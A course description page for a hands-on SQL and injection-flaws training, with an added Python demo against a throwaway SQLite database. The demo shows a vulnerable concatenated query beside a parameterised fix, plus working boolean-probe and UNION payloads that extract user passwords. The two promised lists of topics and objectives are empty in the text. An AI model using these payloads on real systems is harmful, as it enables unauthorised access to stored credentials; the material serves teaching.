OWASP ranks injection flaws as A1, the single most critical risk in its Top 10 Most Critical Web Application Security Risks (2010 edition): http://www.owasp.org/index.php/Top_10_2010-A1
Watch Sid talk about the upcoming course here: http://www.ustream.tv/recorded/31958833
This hands-on session focuses only on injection flaws, and attendees will gain an in-depth understanding of the vulnerabilities that arise from them. The topics covered in the class are:
During the two-day course, attendees will have access to a number of challenges for each flaw and will learn a variety of exploitation techniques used by attackers in the wild. Identify, extract, escalate, execute: we have got it all covered. The objectives of the course are:
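As an added illustration of the "identify" and "extract" steps the course refers to (example code written for this page, not course material), the block below builds a throwaway SQLite database with a constructed products table and a constructed users table, exposes one search function that concatenates user input into SQL and one that uses a bound parameter, and then runs two classic tests against each: a boolean-based probe (do a true and a false tautology return different rows?) and a UNION-based extraction of the users table through the product search. All table names, rows and credentials are invented for the demo.

```python
import sqlite3


def build_db():
    """Constructed demo database: two tables, a few invented rows."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    cur.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)",
        [("widget", 9.99), ("gadget", 19.99)],
    )
    cur.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """The injectable pattern: the search term is pasted into the SQL text,
    so a single quote in `term` ends the string literal and the rest is SQL."""
    sql = "SELECT name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The fix: the term travels as a bound parameter, never as SQL syntax."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


def identify(conn, search):
    """Boolean-based probe. If the two tautologies produce different result
    sets, the input is being interpreted as SQL; if the parameter is bound,
    both are just literal (non-matching) product names and return nothing."""
    true_rows = search(conn, "widget' AND '1'='1")
    false_rows = search(conn, "widget' AND '1'='2")
    return true_rows != false_rows


def extract_users(conn, search):
    """UNION-based extraction: the product query has two columns, so a
    two-column SELECT from another table is appended and the trailing quote
    is neutralised with a comment. Returns the leaked rows (none if safe)."""
    payload = "x' UNION SELECT username, password FROM users -- "
    return search(conn, payload)


if __name__ == "__main__":
    db = build_db()
    for label, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        print(label, "injectable:", identify(db, fn))
        print(label, "leaked rows:", sorted(extract_users(db, fn)))
```

Note that `sqlite3` refuses stacked statements in a single `execute()` call, so this demo stays within what a single injected query can do; the escalation and execution steps the course lists depend on the target database engine and are not shown here.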
Students must bring their own laptop with a Windows operating system installed (either natively or in a VM). Students must also have administrative access so they can perform tasks such as installing software and disabling antivirus. Devices without an Ethernet port (e.g. MacBook Air, tablets) are not supported. Prior knowledge of database systems and SQL is an advantage but not a strict requirement.
Sumit "sid" Siddharth works as Head of Penetration Testing for 7Safe Limited in the UK. He specializes in application and database security and has more than 8 years of experience in penetration testing. Sid has authored a number of whitepapers and tools. He has been a speaker and trainer at many security conferences, including Black Hat, DEF CON, OWASP AppSec and HITB. He also runs the popular IT security blog www.notsosecure.com. Sid is a co-author of the book SQL Injection: Attacks and Defence (2nd edition).